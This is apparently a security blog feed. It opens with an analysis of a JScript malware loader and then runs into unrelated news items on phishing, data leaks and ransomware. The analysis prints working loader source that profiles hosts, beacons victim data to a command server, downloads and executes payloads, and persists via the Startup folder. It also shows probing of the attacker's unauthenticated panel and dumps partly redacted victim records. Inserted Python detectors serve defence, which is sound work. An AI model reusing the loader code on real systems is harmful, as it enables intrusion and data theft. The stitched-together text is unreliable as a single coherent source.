The JavaScript code is quite lean and is shipped in clear text: no obfuscation techniques were used in this sample. The code is commented and the syntax is consistent throughout the file. Spacing, brackets, loops and variable assignments are clean, uniform and always follow the same conventions. This absence of inconsistencies suggests the developer was a single person who wrote the entire code base without code reuse or hand-offs between team members (or at least spent a lot of time unifying the syntax, which usually makes little sense in the offensive world). The following snippet shows what I mean by lean and consistent code syntax.

// Loader version
var version = "OLD";

// Server
var server = "hxxp://93 .115. 21 .62/server/gate.php"; // modified by the blog author to avoid involuntary clicks

// Interval between knocks in seconds
var interval = 181;

// How many times repeat failed task
var attemptsCount = 3;

// Status of running loader
var status = "Active";
// Path for download files
var wss = new ActiveXObject('WScript.Shell');
var defaultPath = wss.ExpandEnvironmentStrings('%APPDATA%');
var scriptFullPath = WScript.ScriptFullName;
var scriptName = WScript.ScriptName;
var fakeAutorunName = "MicrosoftOneDrive";
var shellObj = WScript.createObject("WScript.Shell");

// Connecting JSON module
ImportJSON();

// Collecting PC information
var clientInfo = GetClientInfo();

// Adding script to autorun

// Starting loader
while (status == "Active") {
    DoTasks(SendClientInfo());
    WScript.sleep(interval * 1000);
    DoTasks(SendKnock());
}

Initial section of the analyzed source code

The JavaScript is made to act in a Microsoft Windows environment: it uses classic execution techniques such as ActiveXObject running WScript.Shell against the victim system. The script per se does not present innovative ways to execute code on the machine, and it looks like quite simple but still effective software.

Main loop

The JavaScript has a main loop that keeps it running. It is really straightforward: it sends client information to the command and control server, sleeps for some seconds, and finally performs the tasks returned by the C2.

while (status == "Active") {
 DoTasks(SendClientInfo());
 WScript.sleep(interval * 1000);
 DoTasks(SendKnock());
}

Loader.js Main Loop

Both SendClientInfo() and SendKnock() share the same style. For example, both of them instantiate a response variable, which is returned and then interpreted by the DoTasks function.

function SendClientInfo() {
    var response;
    try {
        var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        var temp = WinHttpReq.Open("POST", server, false);
        WinHttpReq.SetRequestHeader("Content-Type", "application/json");
        WinHttpReq.SetRequestHeader("mode", "info");
        WinHttpReq.SetRequestHeader("uuid", clientInfo["uuid"]);
        WinHttpReq.SetRequestHeader("version", version);
        WinHttpReq.Send(JSON.stringify(clientInfo));
        WinHttpReq.WaitForResponse();
        response = WinHttpReq.ResponseText;
    } catch (objError) {
        response = objError + "\n"
        response += "WinHTTP returned error: " + 
            (objError.number & 0xFFFF).toString() + "\n\n";
        response += objError.description;
    }
    return response;
}

function SendKnock() {
    var response;
    try {
        var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        var temp = WinHttpReq.Open("POST", server, false);
        WinHttpReq.SetRequestHeader("Accept", "application/json");
        WinHttpReq.SetRequestHeader("mode", "knock");
        WinHttpReq.SetRequestHeader("uuid", clientInfo["uuid"]);
        WinHttpReq.SetRequestHeader("version", version);
        WinHttpReq.Send();
        WinHttpReq.WaitForResponse();
        response = WinHttpReq.ResponseText;
    } catch (objError) {
        response = objError + "\n"
        response += "WinHTTP returned error: " + 
            (objError.number & 0xFFFF).toString() + "\n\n";
        response += objError.description;
    }
    return response;
}

Very clear style: it looks like the TA does not use false flags at all, nor mix different code styles to emulate code reuse. The entire code looks like a brand new code base, developed from scratch, since no matches have been found.

C2 Communication

The command and control communication is performed by the polling loop. The main loop periodically sends the client information to the C2 and later “knocks” to the server, which replies with a response piggybacking a specific task to be performed on the victim. The following switch selector implements a simple — but still effective — backdoor, executing tasks on victims. The framework offers download-and-execute capabilities, execution capabilities, assigned task monitoring, and kill capabilities for stopping running tasks.

       while ( (attempts > 0) && (result != 'True') ) {
            switch (tasks[task]["type"]) {
                case "Download & Execute":
                    result = DownloadAndExecute(tasks[task]["content"]);
                    if (result == 'False')
                        details = "Error: download or executing file failed";
                    break;
                case "Execute":
                    result = Execute(tasks[task]["content"]);
                    if (result == 'False')
                        details = "Error: executing file failed";
                    break;
                case "Terminate":
                    status = "Stopped";
                    result = 'True';
                    break;
                default:
                    result = 'False';
                    details = "Error: unknown task type";
                    break;
            }
            if (result == 'False')
                attempts--;
            else
                details = "Success";
            SendTaskResult(tasks[task]["id"], result, details);
        }

Switch on task type to perform actions on victims

The most interesting functions (at least from my personal point of view) are the following ones: Download & Execute and Execute. The first is used to deploy other post-exploitation frameworks to gain more sophisticated control of the machine, for example a remote shell or a direct RDP connection. The second selector (Execute) is used merely to run plain commands on the victim; it could be very useful for manual lateral movement or for specific searches on the infected machine.

It is interesting to see that the switch block is protected against exceptions, yet the developer decided not to actually manage them. For example, looking at the following row

result = DownloadAndExecute(tasks[task]["content"]);

it’s clear that the malware developer assumes that content exists in the tasks[task] entry. If it does not exist, an exception is raised and nothing handles it. This is another distinctive decision by the malware developer, which could be useful for attribution.

But one of the most interesting pieces of the software is the way the developer (ab)uses WMI to extract information from the local environment. In this specific case we see the UUID extraction:

    // Retrieve UUID
    try {
        var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_ComputerSystemProduct")); !i.atEnd(); i.moveNext() )
        initInfo["uuid"] = i.item().UUID;
    } catch (err) {
        initInfo["uuid"] = 'N/A';
    }

IP extraction, this time relying on ipinfo.io:

    // Retrieve client IP
    try {
        var ipReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        ipReq.Open("GET", "http://ipinfo.io/ip", false);
        ipReq.Send();
        ipReq.WaitForResponse();
        ipRes = ipReq.ResponseText;
        initInfo["ip"] = ipRes.replace(/^\s+|\s+$/g, '');
    } catch (err) {
        initInfo["ip"] = 'N/A';
    }

Country Extraction (based on IP)

    // Retrieve country
    try {
        var countryReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
        countryReq.Open("GET", "http://ipinfo.io/country", false);
        countryReq.Send();
        countryReq.WaitForResponse();
        countryRes = countryReq.ResponseText;
        initInfo["location"] = countryRes.replace(/^\s+|\s+$/g, '');  
    } catch (err) {
        initInfo["location"] = 'N/A';
    }

OS Name Extraction

    // Retrieve OS name
    try {
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_OperatingSystem")); !i.atEnd(); i.moveNext() )
        initInfo["os"] = i.item().Caption;
    } catch (err) {
        initInfo["os"] = 'N/A';
    }

User Name and Role Extraction

    // Retrieve User name
    try {
        var shellObj = new ActiveXObject("WScript.Shell");
        var netObj = new ActiveXObject("WScript.Network");
        initInfo["user"] = netObj.ComputerName + '/' + shellObj.ExpandEnvironmentStrings("%USERNAME%");
    } catch (err) {
        initInfo["user"] = 'N/A';
    }

    // Retrieve user role
    try {
        initInfo["role"] = "User";
        var groupObj = GetObject("WinNT://" + netObj.UserDomain + "/" + shellObj.ExpandEnvironmentStrings("%USERNAME%"))
        for (propObj in groupObj.Members)
            if (propObj.Name == "Administrators")
                initInfo["role"] = "Admin";
    } catch (err) {
        initInfo["role"] = 'N/A';
    }

Installed Antivirus Software Extraction

    // Retrieve antivirus info
    try {
        var wmiAV = GetObject("winmgmts:root\\SecurityCenter2");
        for ( var i=new Enumerator(wmiAV.ExecQuery("SELECT * FROM AntivirusProduct")); !i.atEnd(); i.moveNext() )
            if (!initInfo["antivirus"])
                initInfo["antivirus"] = i.item().displayName;     
    } catch (err) {
        initInfo["antivirus"] = 'N/A';
    }

CPU, GPU, RAM and Total Storage

    // Retrieve CPU name
    try {
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_Processor")); !i.atEnd(); i.moveNext() )
            initInfo["cpu"] = i.item().Name;
    } catch (err) {
        initInfo["cpu"] = 'N/A';
    }

    // Retrieve GPU name
    try {
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_VideoController")); !i.atEnd(); i.moveNext() )
            initInfo["gpu"] = i.item().Name;
    } catch (err) {
        initInfo["gpu"] = 'N/A';
    }

    // Retrieve RAM
    try {
        var ramObj = WScript.CreateObject("Shell.Application");
        initInfo["ram"] = Math.round(ramObj.GetSystemInformation("PhysicalMemoryInstalled") / 1048576) + ' MB';
    } catch (err) {
        initInfo["ram"] = 'N/A';
    }

    // Retrieve total storage space
    try {
        var available = 0;
        var total = 0;
        for ( var i=new Enumerator(wmi.ExecQuery("SELECT * FROM Win32_LogicalDisk")); !i.atEnd(); i.moveNext() ) {
            if (i.item().Size != null) {
                available += (i.item().FreeSpace / 1024 / 1024 / 1024);
                total += (i.item().Size / 1024 / 1024 / 1024);
            }
        }
        initInfo["storage"] = Math.round(available) + ' / ' + Math.round(total) + ' GB';
    } catch (err) {
        initInfo["storage"] = '0 / 0 GB';
    }

Finally, the attacker uses net view to check whether there are more PCs on the network. If the function returns some results, the attacker might decide to perform manual lateral movement by introducing (through the download and execute command) a new post-exploitation framework.

Persistence

The framework’s persistence and installation are performed by a simple entry in the autorun regkey, as performed by the following function:

function AddToAutorun() {
    try {
        startupPath = defaultPath + '\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
        fsObj = WScript.CreateObject('Scripting.FileSystemObject');   
        fsObj.CopyFile(scriptFullPath, startupPath);
    } catch (err) { return; }
}

AutoRun And Persistence

The defaultPath variable is set earlier to wss.ExpandEnvironmentStrings('%APPDATA%'), so the JavaScript is stored in the classic %APPDATA% folder, which the current user has permission to write to, and it gets executed on startup through the autorun registration.
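An added defender-side check, not code from the post: it walks the per-user Startup folder that AddToAutorun() copies the script into, flags any file the Windows Script Host would run from there, and compares each file’s MD5 against the sample hash given at the top of the post. The list of extensions beyond .js, the finding names and the helper names are my assumptions.

```python
import hashlib
import os
from pathlib import Path

# MD5 of the Loader.js sample analysed in the post.
LOADER_JS_MD5 = "59a03086db5ebd33615b819a7c3546a5"

# File types the Windows Script Host executes straight from the Startup folder.
# .js is what this sample uses; the others are an assumed list of WSH siblings.
WSH_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh"}

# The relative path AddToAutorun() appends to %APPDATA% before copying itself.
STARTUP_SUBPATH = Path("Microsoft") / "Windows" / "Start Menu" / "Programs" / "Startup"


def user_startup_folder():
    """Resolve the per-user Startup folder the loader copies itself into (None off Windows)."""
    appdata = os.environ.get("APPDATA")
    return Path(appdata) / STARTUP_SUBPATH if appdata else None


def classify_script(name, data):
    """Classify one Startup-folder file by name and raw content.

    Returns None for files WSH would not run; otherwise a (reason, md5) tuple where
    reason is 'known_loader_js_hash' on an exact match with the post's sample, or
    'wsh_script_in_startup' for any other script (unusual in a clean Startup folder).
    """
    if Path(name).suffix.lower() not in WSH_EXTENSIONS:
        return None
    digest = hashlib.md5(data).hexdigest()
    reason = "known_loader_js_hash" if digest == LOADER_JS_MD5 else "wsh_script_in_startup"
    return reason, digest


def scan_startup_folder(folder):
    """Return one finding dict per script file in `folder` (empty list if it does not exist)."""
    findings = []
    folder = Path(folder)
    if not folder.is_dir():
        return findings
    for entry in sorted(folder.iterdir()):
        if not entry.is_file():
            continue
        verdict = classify_script(entry.name, entry.read_bytes())
        if verdict:
            reason, digest = verdict
            findings.append({"path": str(entry), "md5": digest, "reason": reason})
    return findings


if __name__ == "__main__":
    startup = user_startup_folder()
    if startup is None:
        print("APPDATA not set: run this on the Windows host being checked")
    else:
        for f in scan_startup_folder(startup):
            print("%s: %s (md5 %s)" % (f["reason"], f["path"], f["md5"]))
```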

External Resources

Another interesting point is the way the attacker loads external resources. In this script the developer uses ImportJSON(), which fetches the needed library online and then executes it through an eval() statement. For the second time, the attacker assumes that the library is reachable from the target PC, so the victim must be in an environment where githubusercontent.com is not restricted. A simple way to block the execution of this loader in a wide infection scenario would be to block the download of the json2.js library by filtering out the following URL: https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js

function ImportJSON() {
    var xObj = WSH.CreateObject('Microsoft.XMLHTTP'),
    fso = WSH.CreateObject('Scripting.FileSystemObject'),
    temp = WSH.CreateObject('WScript.Shell').Environment('Process')('temp'),
    j2lib = 'https://raw.githubusercontent.com/douglascrockford/JSON-js/master/json2.js'

    if (fso.FileExists(temp + '\\json2.js')) {
        j2lib = fso.OpenTextFile(temp + '\\json2.js', 1);
        eval(j2lib.ReadAll());
        j2lib.Close();
    }
    else {
        with (xObj) {
            open("GET", j2lib, true);
            setRequestHeader('User-Agent', 'XMLHTTP/1.0');
            send('');
        }

        while (xObj.readyState != 4) WSH.Sleep(50);
        eval(xObj.responseText);
        j2lib = fso.CreateTextFile(temp + '\\json2.js', true);
        j2lib.Write(xObj.responseText);
        j2lib.Close();
    }
}
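An added detection example covering both the C2 Communication section and the ImportJSON() fetch above; it is my code, not the author’s. It runs over constructed JSON-lines records from a header-logging web proxy (the record format, the host name c2.example and the indicator names are assumptions) and flags the custom mode/uuid/version header triple, the json2.js download, the ipinfo.io lookups from GetClientInfo(), and knocks repeating at the script’s 181-second interval.

```python
import json
from collections import defaultdict

# Signature values taken from the Loader.js source quoted in the post.
LOADER_C2_MODES = {"info", "knock"}            # values of the custom "mode" header
LOADER_REQUIRED_HEADERS = {"uuid", "version"}  # always sent next to "mode"
JSON2_HOST = "raw.githubusercontent.com"
JSON2_PATH = "/douglascrockford/JSON-js/master/json2.js"
IPINFO_HOST = "ipinfo.io"
IPINFO_PATHS = {"/ip", "/country"}
BEACON_INTERVAL = 181   # seconds; the `interval` variable in Loader.js
BEACON_TOLERANCE = 5    # seconds of slack for sleep and network jitter
MIN_BEACON_GAPS = 3     # consecutive ~181 s gaps before we call it a beacon

# Constructed sample: one record per request from a header-logging proxy
# (format assumed; "c2.example" stands in for the real C2 address).
SAMPLE_LOG = """
{"ts": 1606000000, "src": "10.0.0.5", "method": "GET", "host": "raw.githubusercontent.com", "path": "/douglascrockford/JSON-js/master/json2.js", "headers": {"User-Agent": "XMLHTTP/1.0"}}
{"ts": 1606000001, "src": "10.0.0.5", "method": "GET", "host": "ipinfo.io", "path": "/ip", "headers": {}}
{"ts": 1606000002, "src": "10.0.0.5", "method": "GET", "host": "ipinfo.io", "path": "/country", "headers": {}}
{"ts": 1606000003, "src": "10.0.0.5", "method": "POST", "host": "c2.example", "path": "/server/gate.php", "headers": {"Content-Type": "application/json", "mode": "info", "uuid": "CONSTRUCTED-UUID-1", "version": "OLD"}}
{"ts": 1606000184, "src": "10.0.0.5", "method": "POST", "host": "c2.example", "path": "/server/gate.php", "headers": {"Accept": "application/json", "mode": "knock", "uuid": "CONSTRUCTED-UUID-1", "version": "OLD"}}
{"ts": 1606000365, "src": "10.0.0.5", "method": "POST", "host": "c2.example", "path": "/server/gate.php", "headers": {"Accept": "application/json", "mode": "knock", "uuid": "CONSTRUCTED-UUID-1", "version": "OLD"}}
{"ts": 1606000546, "src": "10.0.0.5", "method": "POST", "host": "c2.example", "path": "/server/gate.php", "headers": {"Accept": "application/json", "mode": "knock", "uuid": "CONSTRUCTED-UUID-1", "version": "OLD"}}
{"ts": 1606000727, "src": "10.0.0.5", "method": "POST", "host": "c2.example", "path": "/server/gate.php", "headers": {"Accept": "application/json", "mode": "knock", "uuid": "CONSTRUCTED-UUID-1", "version": "OLD"}}
{"ts": 1606000010, "src": "10.0.0.9", "method": "POST", "host": "api.example", "path": "/v1/items", "headers": {"Content-Type": "application/json"}}
{"ts": 1606000011, "src": "10.0.0.9", "method": "GET", "host": "ipinfo.io", "path": "/json", "headers": {}}
"""


def _headers(ev):
    """Lower-case the header names so matching is case-insensitive."""
    return {k.lower(): v for k, v in ev.get("headers", {}).items()}


def is_c2_post(ev):
    """POST carrying the loader's custom mode/uuid/version header triple."""
    h = _headers(ev)
    return (ev.get("method") == "POST"
            and h.get("mode") in LOADER_C2_MODES
            and LOADER_REQUIRED_HEADERS <= set(h))


def is_json2_fetch(ev):
    """ImportJSON() pulling json2.js from GitHub before eval()-ing it."""
    return (ev.get("method") == "GET" and ev.get("host") == JSON2_HOST
            and ev.get("path") == JSON2_PATH)


def is_ipinfo_probe(ev):
    """GetClientInfo() asking ipinfo.io for the public IP and country (weak on its own)."""
    return (ev.get("method") == "GET" and ev.get("host") == IPINFO_HOST
            and ev.get("path") in IPINFO_PATHS)


def is_beaconing(timestamps):
    """True when at least MIN_BEACON_GAPS consecutive gaps sit at ~BEACON_INTERVAL."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    run = best = 0
    for g in gaps:
        run = run + 1 if abs(g - BEACON_INTERVAL) <= BEACON_TOLERANCE else 0
        best = max(best, run)
    return best >= MIN_BEACON_GAPS


def analyze(lines):
    """Map each source IP to the sorted list of Loader.js indicators seen in its traffic."""
    findings = defaultdict(set)
    knocks = defaultdict(list)
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        src = ev["src"]
        if is_c2_post(ev):
            findings[src].add("loader_c2_headers")
            if _headers(ev).get("mode") == "knock":
                knocks[src].append(ev["ts"])
        if is_json2_fetch(ev):
            findings[src].add("json2_eval_fetch")
        if is_ipinfo_probe(ev):
            findings[src].add("ipinfo_recon")
    for src, ts in knocks.items():
        if is_beaconing(ts):
            findings[src].add("beacon_%ds" % BEACON_INTERVAL)
    return {src: sorted(f) for src, f in findings.items()}


if __name__ == "__main__":
    for src, hits in analyze(SAMPLE_LOG.splitlines()).items():
        print(src, ", ".join(hits))
```

The header triple and the json2.js URL are the high-confidence signals; the ipinfo.io lookups and the 181-second cadence mainly add corroboration.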

Command And Control Web Panel

Taking a closer look at the command and control server, available at hxxp://93 .115. 21 .62/server/, we see that the attacker left the directory named server free to list its contents. We can now enumerate the entire directory and make some guesses on how the command and control web panel works.

C2 Server listing folder

Fortunately, it looks like the panel does not check the login session correctly, leaving me free to query the single .php files even without any real credentials. For example, performing a simple HTTP GET request to drawAntivirusesChart.php we get the following result.

{
  "data": [
    {
      "name": "AhnLab V3 Lite",
      "count": 1
    },
    {
      "name": "Windows Defender",
      "count": 3
    },
    {
      "name": "Quick Heal Internet Security",
      "count": 1
    },
    {
      "name": "N\\/A",
      "count": 1
    },
    {
      "name": "SecureAPlus Antivirus",
      "count": 1
    },
    {
      "name": "Emsisoft Anti-Malware",
      "count": 1
    },
    {
      "name": "Webroot SecureAnywhere",
      "count": 1
    }
  ]
}

So we are able to query the C2 and get results back, in order to estimate how wide the current attack surface is and what the current victimology looks like. Let’s start by understanding the attack range. The file printSummaryOverview.php would definitely help us get a quick overview, so let’s query it and see how big the infection looks.

{"online":0,"onlineToday":4,"onlineWeek":9,"onlineMonth":9,"newToday":4,"newWeek":9,"newMonth":9,"dead":0}

We actually have a very small set of victims, maybe because they have been selected or maybe because it is an early-stage threat (I would bet on the second hypothesis). By querying printTopCountries.php I would expect to see the target areas; indeed, if you remember, Loader.js retrieves the target country and location from ipinfo.

{"data":[["IN",2],["RU",1],["DE",3],["ES",1],["AZ",2]]}

Sweet! Now, what if we query the endpoint named printClients.php in the same way? Will it be a kind of database dump with the entire victimology? Yes it is!

{
  "draw": 0,
  "recordsTotal": 9,
  "recordsFiltered": 9,
  "data": [
    {
      "id": "2",
      "uuid": "18D68C6D-OMISSIS by Author",
      "ip": "115.69.OMISSIS by Author",
      "location": "IN",
      "os": "Microsoft Windows 8.1 Enterprise Evaluation",
      "user": "IE11W OMISSIS by Author/IEUser",
      "role": "N\\/A",
      "antivirus": "AhnLab V3 Lite",
      "cpu": "AMD A6-6310 APU with AMD Radeon R4 Graphics ",
      "ram": "4096 MB",
      "storage": "312 \\/ 465 GB",
      "network": "0",
      "added": "2020-11-21 17:50:58",
      "seen": "2020-11-21 18:05:48",
      "version": "OLD"
    },
    {
      "id": "3",
      "uuid": "032E02B4-OMISSIS by Author",
      "ip": "185.107.1OMISSIS by Author",
      "location": "RU",
      "os": "\\u041c\\u0430\\u0439\\u043a\\u0440\\u043e\\u0441\\u043e\\u0444\\u0442 Windows 10 Pro",
      "user": "DESK OMISSIS by Author H5\\/Admin",
      "role": "User",
      "antivirus": "Windows Defender",
      "cpu": "AMD Ryzen 5 PRO 3400G with Radeon Vega Graphics",
      "ram": "14284 MB",
      "storage": "535 \\/ 1009 GB",
      "network": "0",
      "added": "2020-11-21 22:35:17",
      "seen": "2020-11-21 22:38:18",
      "version": "OLD"
    },
    {
      "id": "4",
      "uuid": "67CDDC1F - OMISSIS by Author",
      "ip": "94.114.OMISSIS by Author",
      "location": "DE",
      "os": "Microsoft Windows 10 Pro",
      "user": "NQ OMISSIS by Author D1HVy",
      "role": "N\\/A",
      "antivirus": "Windows Defender",
      "cpu": "Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz",
      "ram": "4096 MB",
      "storage": "487 \\/ 511 GB",
      "network": "0",
      "added": "2020-11-21 23:48:48",
      "seen": "2020-11-21 23:48:48",
      "version": "OLD"
    },

---- snip ----

  ],
  "debug": "SELECT `id`, `uuid`, `ip`, `location`, `os`, `user`, `role`, `antivirus`, `cpu`, `ram`, `storage`, `network`, `added`, `seen`, `version` FROM `clients` "
}

The debug string is quite interesting as well: it shows us the database layout.

We now have all the information we need! We really don’t care about the graphical UI, but if you are curious about the panel’s .CSS, well, you are just a few clicks away from it 😉

Unknown TA Dashboard

Conclusion

The sample Loader.js (available HERE) is a new kind of simple loader with basic command and control functionality. From the sample it has been possible to identify the command and control infrastructure and, with some luck, its functionality. Fortunately the victimology is so small that it makes me think of an early-stage system, or maybe an emerging threat still under development.

One in Seven #BlackFriday Emails Are Malicious


More than one in seven emails sent on Black Friday today could be a scam, security experts have warned.

Vade Secure claims to protect one billion inboxes around the world with AI-powered security for Microsoft 365. Its Current Events tracker has detected a predictable spike in malicious messages containing text about the shopping discount extravaganza today.

It said 9% of US emails and 15% in Europe were malicious — spoofing big-name retail brands such as Lidl, Sephora, Target and, most popular, Amazon.

“We are issuing an alert about the Black Friday event in order to warn ISPs and businesses using Microsoft 365 to help them protect customers and clients from malicious emails. Seasonal threats of this nature can be predicted and monitored more easily than surprise attacks, so sysadmins should be aware of the surge in Black Friday email exploits,” explained Vade Secure’s chief product and services officer, Adrien Gendre.

“The rise of online shopping and home working has created new vectors for attackers, so security professionals need to guard carefully against new threats as they emerge. The best way to defeat email threats is to use complementary layers of protection involving both tech and humans.”

The United States Cybersecurity and Infrastructure Security Agency (CISA) also issued an alert today, warning that criminals may be looking to cash-in both online and in-person.

“Malicious people may be able to obtain personal information (such as credit card numbers, phone numbers, account numbers and addresses) by stealing your wallet, overhearing a phone conversation, rummaging through your trash (a practice known as dumpster diving) or picking up a receipt at a restaurant that has your account number on it,” it claimed.

“If a thief has enough information, he or she may be able to impersonate you to purchase items, open new accounts or apply for loans.”

The agency urged shoppers to check company privacy policies, monitor their bank statements, use passwords and other security features where available and to avoid sharing personal information online.

Details of 16 million Brazilian COVID-19 patients exposed online

The personal and health details of more than 16 million Brazilian COVID-19 patients, including Government representatives, have been exposed online.

Personal and health details of more than 16 million Brazilian COVID-19 patients have been accidentally exposed online due to an error by an employee of a Brazilian hospital.

An employee of Albert Einstein Hospital in Sao Paulo uploaded a spreadsheet containing usernames, passwords, and access keys to sensitive government systems to GitHub.

The spreadsheet contained the login credentials for several systems, including the E-SUS-VE and Sivep-Gripe applications that are used to manage data on COVID-19 patients.

The archive includes data belonging to government representatives, including Brazil President Jair Bolsonaro, seven ministers, and 17 provincial governors.

The exposed data includes patient names, addresses and ID information, but also healthcare records such as medical history and medication regimes.


The data leak was discovered by a GitHub user who found the spreadsheet containing the credentials on the GitHub account associated with the hospital employee.

The user shared his discovery with the Brazilian newspaper Estadao, which notified the Brazilian Ministry of Health and the hospital.

The spreadsheet was promptly removed from GitHub and the passwords and the access keys for the systems were changed.

Pierluigi Paganini

(SecurityAffairs – hacking, COVID-19)

The post Details of 16 million Brazilian COVID-19 patients exposed online appeared first on Security Affairs.

Hashtag Trending – Amazon server outage; Shopify gets a shoutout in the NYT; Raspberry Pi hacks a Tesla

An Amazon outage knocks out connected vacuum cleaners and other “smart” objects, Shopify gets a shoutout in the New York Times as it is compared to Amazon, and a Tesla gets hacked with a Raspberry Pi.

The post Hashtag Trending - Amazon server outage; Shopify gets a shoutout in the NYT; Raspberry Pi hacks a Tesla first appeared on IT World Canada.

NHS Error Exposes Data on Hundreds of Patients and Staff


Hundreds of NHS patients and staff have had their personal data exposed to strangers after internal process failures, it has emerged this week.

Human error at NHS Highland earlier this month led to the personal information of 284 patients with diabetes being shared via email with 31 individuals, according to local reports.

Although details of medical history were not in the spreadsheet accidentally sent to the 31 people, it did apparently include names, dates of birth, contact information and hospital identification numbers.

That’s more than enough to craft convincing follow-on phishing emails.

The affected patients have been contacted and the Information Commissioner’s Office (ICO) notified, although it is not the first time the trust has been found wanting. In 2018 it apparently exposed the names of over 30 patients with HIV.

“Due to the fact that the information was stored on a spreadsheet and easily emailed out serves as a reminder that even if organizations have good security controls, they will not be effective unless there is a culture of security and staff understand the importance of securing data,” argued KnowBe4 security awareness advocate, Javvad Malik.

“It is an organization’s responsibility to inform staff of the importance of cybersecurity and provide the tools, training and processes needed to keep information secure.”

The second breach was reported at Basingstoke hospital, run by Hampshire Hospitals NHS Foundation Trust in southern England.

Although reported to the ICO in July, it has only just come to light in papers published by the trust, according to local media.

This time a spreadsheet containing personal information on 1000 members of staff at the hospital was shared with senior managers.

The same hospital suffered another breach the following month, after details of a woman who suffered a stillbirth were apparently published online.

The healthcare sector suffered 214 reported data incidents in Q1 2020-21, more than any other and accounting for about 15% of the total for the period, according to the ICO.

Human error accounted for a large number of these incidents. For example, incidents involving data emailed, posted or faxed to incorrect recipients and incorrect use of BCC comprised nearly a third (30%) of the total.

Staying safe while gaming: how to ensure your children don’t become victims of financial fraud

Protect your children from financial frauds when gaming. If you’re a parent and haven’t been in touch with gaming for a while, you’d be surprised at...

The post Staying safe while gaming: how to ensure your children don’t become victims of financial fraud appeared first on Quick Heal Blog | Latest computer security news, tips, and advice.

Canon publicly confirms August ransomware attack and data breach

Canon finally confirmed that it has suffered a ransomware attack in early August that resulted in the theft of data from its servers.

Canon has finally confirmed that it was the victim of a ransomware attack in early August and that the threat actors also stole data from its servers.

In August, ZDNet first revealed the ransomware attack after it obtained an internal memo confirming that the outage suffered by Canon a few days earlier was caused by a ransomware attack.

The memo also reveals that the company has hired an external security firm to investigate the incident.

The problem was first reported by Bleepingcomputer, which tracked a suspicious outage on Canon’s image.canon cloud photo and video storage service. According to the media outlet, the incident resulted in the loss of data for users of their free 10GB storage feature.

The image.canon site suffered an outage on July 30th, 2020, that lasted for six days, until August 4th.

At the time the company only confirmed an internal investigation on a problem related to “10GB of data storage.”

Canon incident notice
Source BleepingComputer

According to Canon, some of the photo and image files saved prior to June 16 were “lost,” but it pointed out that they were not exposed in a data leak.

In mid-August, the Maze ransomware gang took credit for the attack and published unencrypted files allegedly stolen the Canon during the ransomware attack.

BleepingComputer obtained from its source a portion of the ransom note and an internal notification that Canon sent to its employees.

Canon internal notice – Source BleepingComputer

Maze ransomware operators started publishing data stolen from the company on their data leak site. The gang published a 2.2 GB archive called “STRATEGICPLANNINGpart62.zip” that the attackers claim contains around 5% of the total amount of documents stolen during the attack.

The archive contains files related to Canon’s website and marketing materials; according to BleepingComputer’s source, it does not appear to contain any financial information, employee information, or other sensitive data.

The investigation conducted by Canon found evidence of unauthorized access to its network between July 20 and August 6.

The hackers accessed company file servers that contained information about current and former employees from 2005 to 2020 and their beneficiaries and dependents.

This week, Canon confirmed the ransomware attack and the data breach. According to the company’s statement, the stolen data included employees’ names, Social Security numbers, dates of birth, driver’s license or government-issued ID numbers, the bank account numbers used for direct deposits from Canon, and their electronic signatures.

“We identified a security incident involving ransomware on August 4, 2020.” reads the statement. “We determined that there was unauthorized activity on our network between July 20, 2020 and August 6, 2020. During that time, there was unauthorized access to files on our file servers. We completed a careful review of the file servers on November 2, 2020 and determined that there were files that contained information about current and former employees from 2005 to 2020 and their beneficiaries and dependents.”

On November 1, the Maze gang shut down its operations. The list of the gang’s victims is long and includes steel sheet giant Hoa Sen Group, Southwire, LG Electronics, Xerox, and the City of Pensacola.

Pierluigi Paganini

(SecurityAffairs – hacking, Canon)

The post Canon publicly confirms August ransomware attack and data breach appeared first on Security Affairs.

Digitally Signed Bandook Malware Once Again Targets Multiple Sectors

A cyberespionage group with suspected ties to the Kazakh and Lebanese governments has unleashed a new wave of attacks against a multitude of industries with a retooled version of a 13-year-old backdoor Trojan. Check Point Research called out hackers affiliated with a group named Dark Caracal in a new report published yesterday for their efforts to deploy "dozens of digitally signed variants" of

Group-IB launches new threat hunting and attack prevention solution

Group-IB has revealed the results of its years-long development of proprietary high-tech products for threat hunting and research — Threat Intelligence & Attribution and Threat Hunting Framework. Group-IB has become the first company to offer a new type of solution called Threat Intelligence & Attribution. The system is designed to create and customize a cyber threat map for a specific company, correlate individual cybersecurity events in real time, and attribute attacks to a particular threat … More

The post Group-IB launches new threat hunting and attack prevention solution appeared first on Help Net Security.

Attacks are rising in all vectors and types

DDoS, web application, bot, and other attacks have surged exponentially compared to the first half of 2019, according to CDNetworks. In particular, attacks on web applications rose by 800%. These alarming statistics show that enterprises are experiencing challenging times in their attempts to defend against cyber attacks and protect their online assets.

Hackers extremely sensitive to industry transformation

The report goes on to say that hackers are extremely sensitive to industry transformation. For this reason, … More

The post Attacks are rising in all vectors and types appeared first on Help Net Security.

The current state of third-party risk management

Third-party risk management (TPRM) professionals increasingly do not trust that security questionnaires provide sufficient information to properly understand and act on their third-party risk, according to RiskRecon and Cyentia Institute. As a result, the study found more enterprises are moving towards data-driven third-party risk management programs.

Many firms use questionnaires to assess vendor security risk

The research, based on a survey of 154 active TPRM professionals, found that 79% of firms have a TPRM program, … More

The post The current state of third-party risk management appeared first on Help Net Security.

Top digital security worries when it comes to remote employees

